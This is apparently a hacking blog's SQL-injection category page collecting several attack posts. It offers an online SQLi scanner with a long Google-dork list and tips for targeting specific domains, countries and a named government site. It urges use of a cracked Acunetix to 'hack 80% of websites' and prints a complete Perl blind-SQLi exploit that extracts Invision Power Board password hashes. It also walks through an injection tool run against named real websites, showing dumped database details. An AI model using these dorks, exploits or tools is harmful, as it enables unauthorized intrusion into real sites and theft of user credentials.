Home » Posts filed under SQL INJECTION
xuhaid SQLi Scanner V3
xuhaid SQLi Scanner V3 ✩
--Status:[online]--
I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!
Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links.
Private Online SQLi Scanner V1
*Click here to Access*
Public Online SQLi Scanner V1
*Click here to Access*
Private Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*
Public Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*
Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner For Those who hate scanning websites For more info Check here : http://sqlscanner.info/Public-Sql-Scanne...index.html
Public Scanner Version 1 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v1log.txt
Public Scanner Version 2 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v2log.txt
After Scanning You can Now easily Remove Links with one Click From here : http://sqlscanner.info/Repeatremover.html
About Version 2 If you Guys Dnt know This will Scan Only Vulnerable Sites
Example :
Dork List :
inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=Quote:Use online sqli scanner (scan specific: websites/domains/countries)
www.sqlscanner.infoQuote:How to: Scan specific websites
Just use it like this:
inurl:php?id=+site:[domain of website]
you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]
If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]
Examples:
If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br
If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk
If You Face Any Kinda Problem Can Contact Me Online Here
:
Or reply to this thread - If you find Scanner stopped Working Lemme know i have another server i will release the link of that server
Private Online Scanner V1 Credits : R3miCk
Private Online Scanner V2 Credits : R3miCk ( Edited By me )
Public Online Scanner V1 Credits : R3miCk ( Edited By Me )
Public Online Scanner V2 Credits : R3miCk ( Edited By me )
Remove Duplicate : By Me ( XuhaiD )
Scan Specific Website Domain Credits : Hack.addict.pt
sqlscanner.info Index Page Credit's : th3-Outlaw Tools
Enjoy
[TUT] Hack about 80% of every website out there
All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.
You want to learn to hack, stop asking stupid questions.
There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :
It's called Acunetix.
Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.
It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.
So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).
DOWNLOAD :
HERE
PASSWORD : hf.net
(Uploaded by me, 100% clean)
Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps (my 10 year old brother could do this).
It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.
So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.
Oh, and last tip : http://www.google.com is your friend. Don't forget it before you ask anything else.
Invision Power Board SQL injection exploit by RST/GHC
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
Devilzc0de SQL Injection Tool (mysql&mssql)
ool name: devilzc0desql.py version 1.0
Download url:
http://flightinformationdisplay.com/mywisdom/devilzc0desql.tgz
or
http://yoyoparty.com/upload/devilzc0desql.tgz
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl
So.. what is devilzc0desql? this is a very sophisticated sql injection tool for mysql injection, mssql injection and ms access (jet oledb) sql injection.
Then just type :
python devilzc0desql.pyAnd the result is:
root@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql# ./devilzc0desql.py
****************************************************************************
Devilzc0deSQL.py version 1.0
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Dedicated to: Devilzc0de
This is All in one sql injection tool for both mysql and msssql and ms access
****************************************************************************
Please choose your option below:
[1] Attack Mysql target (this will lauch hzosql)
[2] Attack Mssql target (this will launch silviasql)
Type 1 or 2 for your choice below !
Please type your choice:Ok then…if you need to run mysql injection tool, just type: 1 otherwise, if you wanna run mssql injection tool, just type: 2
Option number 1 (running mysql injection tool mode (hzosql))
***********************************************************************************************************************************************
HZO mysql injection tool version 2.0
dedicated for hackerzonline.info,devilzc0de.org,gorontalodefacer.org,h4cky0u.org,jasakom.com,yogyacarderlink.web.id and darkc0de.com
by: mywisdom (antonsoft_2004@yahoo.com)
*************************************************************************************************************************************************
Results saved at hzosql.log
additional support(s): load file checking, blind sqli checking, log w00t message at hzosql.log
Steps:
1. Check url for vulnerable sql injection or blind sql injection
2. Check multiple url lists from a text file for vulnerable sql injection and blind sql injection
3. Find column length of multiple url lists from a text file (non blind sqli)
4. Find column length of sqli and blind sql injection of a target
5. Get mysql server configuration from a sqli url (must include code),load file, select mysql.user (mysql 4 and 5)
6. Show all databases user has access to (must include code) ( mysql 5+)
7. Enumerates information_schema databases(must include code) (mysql 5+)
8. Dump information from database, table or column (must include code) (mysql 4 and 5)
9. Fuzz tables and columns (must include code) (mysql 4)
10.Automatic Step by Steps Sql Injections or Blind Sql Injections (run step 4 until step 7 automaticly)
11.Full Web SQLi testing (search sqli from every proper url at front page)
12.Exit this module
Just type 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 (based on steps you have done)
Type your step number:Ok this is our mysql injection tool called hzo sql version 2.0, it’s different from version 1.0 , in this version now it supports more accurate blind sql injection, load file checking and also log results.Ok to do a quick sql injection the best way is using option number 10, so what you need is just type: 10 , then it will aks you for your target url, something like this:
***********************************************************************************************************************************************
HZO mysql injection tool version 2.0
dedicated for hackerzonline.info,devilzc0de.org,gorontalodefacer.org,h4cky0u.org,jasakom.com,yogyacarderlink.web.id and darkc0de.com
by: mywisdom (antonsoft_2004@yahoo.com)
*************************************************************************************************************************************************
Results saved at hzosql.log
additional support(s): load file checking, blind sqli checking, log w00t message at hzosql.log
Steps:
1. Check url for vulnerable sql injection or blind sql injection
2. Check multiple url lists from a text file for vulnerable sql injection and blind sql injection
3. Find column length of multiple url lists from a text file (non blind sqli)
4. Find column length of sqli and blind sql injection of a target
5. Get mysql server configuration from a sqli url (must include code),load file, select mysql.user (mysql 4 and 5)
6. Show all databases user has access to (must include code) ( mysql 5+)
7. Enumerates information_schema databases(must include code) (mysql 5+)
8. Dump information from database, table or column (must include code) (mysql 4 and 5)
9. Fuzz tables and columns (must include code) (mysql 4)
10.Automatic Step by Steps Sql Injections or Blind Sql Injections (run step 4 until step 7 automaticly)
11.Full Web SQLi testing (search sqli from every proper url at front page)
12.Exit this module
Just type 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 (based on steps you have done)
Type your step number:
10
*******************loading...***********************************
(this tool can work with blind sql injection now!!!)
Type your target url:
http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5
(if you don't type max column length to search, max column search will be 100)
Type max column length number to search:
15Ok in this sample I just copy and paste my target url: http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5Then it will ask you for max column length number, in this case I type 15 for max column length for test, it’s up to you, you may input 20 or 20 or 100, and so on…
Ok then you will see below that our target is vulnerable to blind sql injection:
The MSSQL Injection Tool
Ok suppose you run devilzc0desql.py and choose option number 2, Ok here is our mssql injection tool start:
Ok next I’m testing to search for vulnerable target(s) from google uk here the sample:
Ok here’s more complete step by step example:
**********************Silvia SQL version 2.0***************************
Programmer:mywisdom (antonsoft_2004.com)
SQLI Tool for MSSQL & MS Jet
Especially dedicated for Silvia
**********************Silvia SQL version 1.0***************************
Option numbers / Steps:
0. Search for sqli vulnerable site(s) from google based on a region(MSSQL and MS Jet only)
1. Check url for vulnerable sql injection (MSSQL and MS Jet)
2. Getting MSSQL Configuration (MSSQL only)
3. Search for Table Name(s) in current Database (MSSQL only)
4. Search for Column Name(s) in a table (MSSQL only)
5. Dump a column (MSSQL only)
6. Automatic Step by Step (Run Step 1 until step 4 automaticly (MSSQL only))
7. List a User and password hash (MSSQL only)
8. Try EXEC xp_cmdshell(MSSQL 2000 only)
9. Searh Column length then try Fuzzing Table(s) and column(s)(MS Jet only)
Type help for Help, type exit to stop this tool
(just type: 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9)
Type your option number:0
This tool will use google.com as default, you may choose other google based on country
Do you want to google search based on country ? (y/n)y
Available google url based on country, please choose:
1. www.google.com
2. www.google.co.uk (google uk)
3. www.google.co.id (google indonesia)
4. www.google.co.il (google israel)
5. www.google.co.in (google india)
6. www.google.co.jp (google japan)
7. www.google.cn (google china)
8. www.google.com.sg (google singapore)
9. www.google.com.my (google malaysia)
10. www.google.com.tr (google turkey)
11. www.google.com.pk (google pakistan)
12. www.google.co.il (google israel)
13. www.google.es (google spain)
14. www.google.com.au (google australia)
(just type the number :1 or 2 or 3 till 14)
Type option number:2
Insert Google Dork:inurl:"page.asp?id="
Total Query Pages (10 Links/Pages) :10
[+] Please wait ! Searching vulnerable mssql and ms jet injection target(s) from google ...
-----------------------------------------------
--------Going to Next Page ----------------
Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=0&meta=cr=countryUK|countryGB
--------Searching from next page,please wait----------------
[+]http://www.northernirelandscreen.co.uk/page.asp?id=211' => Could be Vulnerable in MS Access Injection!!
--------Going to Next Page ----------------
Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=10&meta=cr=countryUK|countryGB
--------Searching from next page,please wait----------------
[+]http://www.northernirelandscreen.co.uk/page.asp?id=239' => Could be Vulnerable in MS Access Injection!!
--------Going to Next Page ----------------
Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=20&meta=cr=countryUK|countryGB
--------Searching from next page,please wait----------------
[+]http://www.englishwomensgolf.org/page.asp?id=327' => Could be Vulnerable in MSSQL Injection!!Ok, here’s explanation for above step(s):From above sample, I choose option number 0 , this will use google to search vulnerable target(s). then I type y , to choose search target based on country.
And next I choose option number 2 for google uk, then I input this dork inurl:”page.asp?id=” and finally ..I type: 10 to search every 10 pages.
Ok next we’re testing for a target here’s the sample of this silviasql:
Especially dedicated for Silvia **********************Silvia SQL version 1.0*************************** Option numbers / Steps: 0. Search for sqli vulnerable site(s) from google based on a region(MSSQL and MS Jet only) 1. Check url for vulnerable sql injection (MSSQL and MS Jet) 2. Getting MSSQL Configuration (MSSQL only) 3. Search for Table Name(s) in current Database (MSSQL only) 4. Search for Column Name(s) in a table (MSSQL only) 5. Dump a column (MSSQL only) 6. Automatic Step by Step (Run Step 1 until step 4 automaticly (MSSQL only)) 7. List a User and password hash (MSSQL only) 8. Try EXEC xp_cmdshell(MSSQL 2000 only) 9. Searh Column length then try Fuzzing Table(s) and column(s)(MS Jet only) Type help for Help, type exit to stop this tool (just type: 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9) Type your option number:2 Do you want to use proxy url ? (y/n)n must include http:// Type target url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307 **********working please wait************** [-] Gathering MSSQL configuration...please wait... [-]SQLI url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307+and+1=convert(int,@@version)# [+]Version Info:Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition with Advanced Services on Windows NT 5.2 (Build 3790: Service Pack 2) [+]Current User:wbcRM-dbuser-readonly [+]Current Database:wbcRM [+]Hostname:WATERBALANCE _________________________________________________________________ Completed running your operation, result saved at silvialog.txt (If no result(s) showed here means there's no data or data can not be dump or your proxy doesnt work, you should check manually or use other working proxy) mywisdom@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql$Ok here’s a little explanation of above sample
first I choose mssql injection tool after running devilzc0desql.py , then I type number:2 for getting mssql information, then I type : n ..so this means no proxy. then I type my target url:
http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307and enter and so on…
Ok see you again …
greets: all devilzc0de, ycl,tecon,jasakom,jatimcrew, darkc0de crews and members
Tool name: devilzc0desql.py version 1.0
Download url: http://yoyoparty.com/upload/devilzc0desql.tgz
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl